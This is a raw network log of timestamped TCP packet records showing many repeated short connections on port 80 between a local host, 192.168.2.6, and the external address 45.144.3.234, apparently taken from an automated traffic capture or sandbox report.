                                            Dec 2, 2020 11:53:49.473809958 CET4988780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.525747061 CET804988745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.665127039 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.717783928 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.717941999 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.720684052 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.773799896 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.773900032 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.827183008 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.851969004 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.851994991 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:49.852099895 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.852494955 CET4988880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:49.907252073 CET804988845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.075242996 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.129091978 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.129208088 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.131951094 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.186650038 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.186764002 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.239518881 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.264707088 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.264864922 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.265106916 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.265202045 CET4988980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.325010061 CET804988945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.462589979 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.515288115 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.515614986 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.537655115 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.591325045 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.591460943 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.644342899 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.667494059 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.667517900 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.667623997 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.667726994 CET4989080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.720535040 CET804989045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.923114061 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.976140022 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:50.976397991 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:50.981117964 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.033353090 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.033487082 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.085524082 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.109476089 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.109499931 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.109594107 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.109740019 CET4989180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.161757946 CET804989145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.443754911 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.496546984 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.496678114 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.500957966 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.553682089 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.554539919 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.607341051 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.629139900 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.629190922 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.629314899 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.629362106 CET4989280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.682271957 CET804989245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.813381910 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.866904020 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.867057085 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.875500917 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.928060055 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:51.928212881 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:51.980148077 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.001681089 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.001729012 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.001888990 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.002022982 CET4989480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.053921938 CET804989445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.200977087 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.253206968 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.253387928 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.299953938 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.352216005 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.352369070 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.404601097 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.427256107 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.427309036 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.427481890 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.427603006 CET4989580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.481483936 CET804989545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.614089966 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.666011095 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.666117907 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.669431925 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.721491098 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.721806049 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.773655891 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.793745995 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.793803930 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:52.793900967 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.793961048 CET4989680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:52.845845938 CET804989645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.035202980 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.088231087 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.089063883 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.093415022 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.146184921 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.146281958 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.203619003 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.221690893 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.221720934 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.221806049 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.221918106 CET4989880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.274401903 CET804989845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.419603109 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.476861954 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.477014065 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.485192060 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.537400961 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.537513018 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.589406013 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.608858109 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.608905077 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.609003067 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.609088898 CET4989980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.660742998 CET804989945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.839678049 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.892520905 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.896189928 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.899708033 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:53.952399969 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:53.952516079 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.005372047 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.026077032 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.026103973 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.026228905 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.026350021 CET4990080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.079098940 CET804990045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.237581968 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.289537907 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.289715052 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.292505026 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.353487968 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.353563070 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.405519009 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.429546118 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.429599047 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.429709911 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.429795980 CET4990280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.482976913 CET804990245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.659071922 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.714225054 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.714371920 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.722059965 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.774771929 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.774919033 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.827564001 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.853921890 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.853962898 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:54.854068041 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.854115963 CET4990380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:54.909718990 CET804990345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.078721046 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.132062912 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.132337093 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.140343904 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.192421913 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.192606926 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.244770050 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.270211935 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.270246029 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.270453930 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.270529985 CET4990480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.322619915 CET804990445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.461230040 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.516282082 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.516473055 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.522610903 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.577491999 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.577641964 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.629848003 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.652744055 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.652793884 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.652930021 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.652975082 CET4990580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.705823898 CET804990545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.878803015 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.933028936 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.933144093 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.936892986 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:55.989126921 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:55.989226103 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.041301966 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.061289072 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.061336994 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.061515093 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.061594963 CET4990680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.114022017 CET804990645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.278841019 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.331147909 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.331319094 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.339313030 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.391474962 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.391856909 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.443921089 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.464035988 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.464090109 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.464288950 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.464327097 CET4990780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.516432047 CET804990745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.676681995 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.729322910 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.729590893 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.737421036 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.789863110 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.790050983 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.842457056 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865797043 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865840912 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:56.865983963 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.866134882 CET4990880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:56.918432951 CET804990845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.065783024 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.118191957 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.118424892 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.123188019 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.174937010 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.175045967 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.233601093 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270092964 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270200014 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.270292044 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.270375967 CET4990980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.323240042 CET804990945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.460324049 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.512840033 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.513051987 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.538551092 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.592236042 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.592422962 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.644962072 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668447018 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668493032 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.668622017 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.668788910 CET4991080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.721627951 CET804991045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.915693045 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.967835903 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:57.967994928 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:57.975991011 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.027992010 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.028104067 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.080158949 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112591982 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112637043 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.112879038 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.112910032 CET4991180192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.166544914 CET804991145.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.300642014 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.353506088 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.353641033 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.357650042 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.410451889 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.410573959 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.463702917 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484031916 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484076977 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.484255075 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.484299898 CET4991280192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.537326097 CET804991245.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.686249018 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.738763094 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.740519047 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.743469954 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.796668053 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.796829939 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.849829912 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873219013 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873261929 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:58.873493910 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.873589039 CET4991380192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:58.925843954 CET804991345.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.109025955 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.161501884 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.161663055 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.169840097 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.226037025 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.226135969 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.283324957 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.308444023 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.308681965 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.309124947 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.309323072 CET4991480192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.361237049 CET804991445.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.538146973 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.590203047 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.590387106 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.598388910 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.652204990 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.652334929 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.704315901 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725656033 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725718021 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.725790024 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.725827932 CET4991580192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.777947903 CET804991545.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.943234921 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:53:59.995922089 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:53:59.996124983 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.003773928 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.056993008 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.057231903 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.109816074 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.132744074 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.132788897 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.133021116 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.133083105 CET4991680192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.185823917 CET804991645.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.336672068 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.389077902 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.389225006 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.415813923 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.471774101 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.471972942 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.524545908 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545377016 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545455933 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.545605898 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.545747042 CET4991780192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.598119020 CET804991745.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.743469954 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.796895981 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.797055006 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.838684082 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.891139984 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.891263962 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.943741083 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.965354919 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.965436935 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:00.965557098 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:00.965631962 CET4991880192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.018170118 CET804991845.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.164114952 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.216789961 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.216933012 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.222614050 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.275428057 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.275552988 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.328247070 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.355035067 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.355071068 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.355158091 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.355201960 CET4991980192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.407859087 CET804991945.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.538387060 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.591151953 CET804992045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.591259956 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.607789993 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.660598993 CET804992045.144.3.234192.168.2.6
                                            Dec 2, 2020 11:54:01.660707951 CET4992080192.168.2.645.144.3.234
                                            Dec 2, 2020 11:54:01.715161085 CET804992045.144.3.234192.168.2.6
